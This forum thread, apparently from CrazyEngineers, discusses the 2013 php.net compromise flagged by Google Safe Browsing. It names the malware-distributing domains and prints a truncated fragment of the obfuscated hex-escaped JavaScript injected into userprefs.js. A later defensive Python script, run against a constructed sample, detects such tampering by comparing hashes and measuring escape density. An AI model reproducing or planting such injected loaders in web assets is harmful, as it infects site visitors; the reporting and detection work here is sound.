Google Chrome reports php.net has malware

Google Chrome is reporting that the official PHP site, php.net, contains malware that can harm your computer. Google Chrome is usually correct about identifying infected websites or websites that may harm visitors' computers, but this time it's hard to believe. Typing php.net into Chrome flashes a warning message that says "Malware Ahead! The website ahead contains malware! Google Chrome has blocked access to php.net for now. Even if you have visited this website safely in the past, visiting it now is very likely to infect your Mac with malware." Out of curiosity, we clicked on 'Details about problem on this website' and found the following information about what might be wrong with php.net -


Of the 1613 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-10-24, and the last time suspicious content was found on this site was on 2013-10-23.
Malicious software includes 4 trojan(s). Malicious software is hosted on 4 domain(s), including cobbcountybankruptcylawyer.com/, stephaniemari.com/, northgadui.com/. 3 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including stephaniemari.com/, northgadui.com/, satnavreviewed.co.uk/.
PHP is one of the most popular web development languages, and php.net is one of the most frequently used resources for PHP developers. Millions of websites all over the world, including CrazyEngineers.com, are powered by PHP. The warning message is being issued by all the leading browsers, viz. Chrome, Mozilla Firefox and Apple's Safari.

We'll keep you posted about the developments on this front. It's not clear whether PHP.net has been deliberately attacked and hacked or whether Google is issuing a false alarm. If you have more information about the issue, please share it with us through the comments.

Replies

  • Kaustubh Katdare
    A word about Google Safe Browsing: It's a service from Google that's used by all the leading web browsers including Safari, Chrome and Firefox. Google shares the information about the websites with Internet Service Providers (ISPs). For PHP.net, the site has not hosted malware for the past 90 days. It'd be interesting to see whether the hackers compromised pages on the site or whether it is only linking to the websites that spread malware.

    Does anyone know more information about the issue?
  • Kaustubh Katdare
    Found some more information about the issue. Members on 'superuser' have been reporting that those malicious links were injected into the JavaScript that php.net uses. It looks like someone has injected obfuscated code into userprefs.js on php.net -

    (function (MH) {
            var aS = "\x96\xad\xa1\xb4\x87\xf8J\x04Y.C\xb4u>\xac\xa8\x95\xbd\x04x\x8e\xa6:\x8c\x00O\x0b`\x04\x20-M@O\x00\x0d+\x0c\x0b\x04IM\x00d\x0fhbH"+
                    "mOO\x08J-\x0a.`iK\x00\x20(\x0b\x08)MM\x00d\x0bhKbmbb\x0bJ-\x09-`OhDf\x08)*B1*C0k\x0d,j2\x0c5+;|C\x19qSu\x1bgT`?\x0c\"1N'v\x0b-,H8"+
                    "ky6Er\x04!]\x19uVD.\x20\x15$qe\x20S>:sU\x1e:2#\x13MQ\x1c<\x20\x02)\x0eSTBlf\x05?62:`In\x17T&\x0c\"\x1e7Y\x01X@\x00/.q\x12\"\x08f#"+
                    "\x04k\x0a\x15`k.\x15rf\x0cbS\x20|x\x106CZ\x14\x18Xu1>:rXy\x0evb\x0d,q\x16\x06j\x025U\"cX\x15y|<2W~\x16\x032-T\x15\x17\\\\q\x01\x03"+
                    "\x09g\x00/.q\x12\"\x08f^\x1as$\x13f\x0e\x20i\x08Ur&H`\x1dd\x17Pt|{\x18Xu5@kn5\x14$*bx\"Yc-&}?~~2Afm\x0c\x11T\x04j`^5tRb\x0d]\x08\"]"+
                    "\x19uVD.\x20\x129wq9S\\\x1e:Qv`+lqVBhBv^?id\x20\x0dh\x11v\"*@\x1e:Rr1<\x00xx\x13&9`\x09,wPd\x0cfzWzA\x06\x1e\x1eBknW\x16B(\x06a\x00q\x02)"+
                    "\x7f*q\x19\x1f\x11v\"*@t9F`k.\x15rf\x0cb[6|\"g{S\x06m\x19\x0c6?9\x17\x14\x06j`8;\x10@Q\x1aBk\x0cUt`*\x06w4\x03\x0f~#f\x1e\x18rw\x20i\x08U"+
                    "r&H`|x\x15`!D\x18<\x11p^\x1apr<:r6\x1c\\2\x14\x1c\x18s\x18\"\x0b*Wr\"l\x02~dF\x16h<:s`\x1c\\7B\x1c\x18rC:u\x06\x1e:3s\x02A@\x1c\x18sC~T_\x20\x0dh\x11v\"*@!\x1eB\x1e:0px\\\x06i=nT=y6.\x14ht\x0ct.R\x1fy\x14\x19q_}"+
                    "\x0ct\x7fr=\x7fZ[@]2y\x19\x1fA\x1f2?\x1fj\x13\x19s_i\x0d[E\x1bS\x1f};V]0y\x1f&{p_?\x7f0;q\x1f9hP[\x15\x1d]jT[\x12[?^\x1f&{t_?\x19#;r\x1f"+
                    "_hW[\x14\x1dIk{ay5_ym\x1fA\x1f3?\x1f\x7f\x14\x19s_\x1bE[\x16\x1d=\x7fR[\x16[9P\x1fu}\x1fc9u\x1f=\x7f0Ypy;P\x1bQ\x1f{ay>_yy6{u_Y6\x19Q\x1f"+
                    "\x19c\x1b\x1d]y}\x12\x19\x12]\x19.*P\x1fp}yx9\x20\x19P\x1f\x1fY!\x7f5y\x1dH1{0\x7f/+\x7f>\x1fA\x1f4?\x1f\x19\x02\x19s_\x1d\x0cz\x7f!;t}]"+
                    "ydY\x16\x19\x19\x08m(\x16\x19v=\x19\x20Ysy]\x0d\x1dI\x19A[\x16[_\x0c0\x1f\x10\x19+9#\x19T\x1f\x1f*4\x7f2yi[?\x09;zo?\x0c\"1N'v\x0b-,H\x10"+
                    "\x0cui_gR&H\x10nw\x0b=fA(!T!\"\x12\x14\x0a[&'n%Pe\x04\x156$\x1bdGjgP!dx-9\x06'.\x056'\"'Rf\x1f$\x05.EtG&Zg\x7f9\x09\x7fk\x04j\x10.5\x19W"+
                    "\x16B(\x06v\x1dqq}s8^\\up\x02m_9\x17\x14\x06j`^8\x160Sq\x20+G$~~2\x15b\x01\x02m__\x7f\x176$j\x20qY=p<1f|x\x123\x20\x0dm?x-*0\x0c5I?'n3A"+
                    "{M&H\x10nwySTBlf\x1326\x03$\x13^\x1e:3txx\x15%)!fsNW$\x06m\x19\x09?P,5\x195\x14$*b\x17v\x10!\x06\x13\x1e\\Z76x
                                        
  • Ankita Katdare
    Looks like Php.net site owners have acknowledged the issue raised by Google Chrome. They have put up on their homepage a note about the corrective measures they are taking to resolve this. So, it's now found to be true that JavaScript malware was served to a small percentage of php.net users from the 22nd to the 24th of October 2013.
    It is good to know that neither the source tarball downloads nor the Git repository were modified or compromised.

    NOTE: Two php.net servers were compromised, and have been removed from service. All services have been migrated to new, secure servers.

    SSL access to php.net Web sites is temporarily unavailable until a new SSL certificate is issued and installed on the servers that need it.
    Php.net users CAN EXPECT that their passwords will be reset.
    Note that users of PHP are unaffected by this: this is solely for people committing code to projects hosted on svn.php.net or git.php.net.
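The second reply above describes the shape of the compromise: an anonymous function wrapping a very long string built from `\xNN` hex escapes, appended to a static JavaScript file (userprefs.js) that the site serves to every visitor. The following is an added example of how a site operator could have caught that tampering from the defender's side; it is not php.net's code and not part of the original discussion. It assumes two things: that a deploy-time manifest of SHA-256 hashes for each static asset exists (here `KNOWN_GOOD`, built inline), and that a hex-escape density above a chosen threshold (10% of the file's characters, an assumed tuning value) is worth a human look. The clean and tampered `userprefs.js` contents are constructed samples, not the real file.

```python
import hashlib
import re

# Constructed sample of a clean static asset, standing in for userprefs.js.
CLEAN_JS = (
    "// userprefs.js (constructed sample, not the real php.net file)\n"
    'function setPref(name, value) { document.cookie = name + "=" + value; }\n'
)

# The same asset with an injected IIFE carrying a hex-escaped blob, the pattern
# the thread describes. The escape sequences here are made up; a raw string keeps
# the backslashes literal so the text looks exactly like served JavaScript.
INJECTED_JS = CLEAN_JS + (
    r'(function (MH) { var aS = "\x96\xad\xa1\xb4\x87\xf8J\x04Y.C\xb4u>'
    r'\xac\xa8\x95\xbd\x04x\x8e\xa6:\x8c\x00O\x0b"; })(window);' + "\n"
)

# Deploy manifest: hash of every static asset as it left version control.
# In a real deployment this is generated at release time and kept off the web host,
# so an attacker who can edit the served file cannot also edit the baseline.
KNOWN_GOOD = {"userprefs.js": hashlib.sha256(CLEAN_JS.encode()).hexdigest()}

HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")


def sha256_hex(text: str) -> str:
    """SHA-256 of the asset text, hex-encoded, matching the manifest format."""
    return hashlib.sha256(text.encode()).hexdigest()


def hex_escape_count(content: str) -> int:
    """Number of \\xNN escape sequences in the file."""
    return len(HEX_ESCAPE.findall(content))


def hex_escape_ratio(content: str) -> float:
    """Fraction of the file's characters that belong to \\xNN escapes.

    Legitimate front-end code rarely carries long runs of hex escapes;
    packed or obfuscated payloads are mostly made of them.
    """
    if not content:
        return 0.0
    return hex_escape_count(content) * 4 / len(content)


def audit_asset(name: str, content: str, manifest: dict, threshold: float = 0.10) -> list:
    """Return a list of findings for one served asset; an empty list means clean.

    Two independent signals: the served bytes no longer match the deploy
    manifest, and the file has an unusually high density of hex escapes.
    """
    findings = []
    expected = manifest.get(name)
    if expected is None:
        findings.append("no baseline hash for asset")
    elif sha256_hex(content) != expected:
        findings.append("hash mismatch against deploy manifest")
    ratio = hex_escape_ratio(content)
    if ratio > threshold:
        findings.append(f"hex-escape density {ratio:.2f} exceeds {threshold:.2f}")
    return findings


if __name__ == "__main__":
    for label, body in (("clean", CLEAN_JS), ("injected", INJECTED_JS)):
        print(label, audit_asset("userprefs.js", body, KNOWN_GOOD) or ["ok"])
```

The hash comparison is the authoritative check: any byte change to a deployed asset is reported regardless of what was injected. The escape-density heuristic is a second, independent signal that still fires when no baseline exists (for example on a host where the manifest was never installed), which is the situation the "no baseline hash" finding flags.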

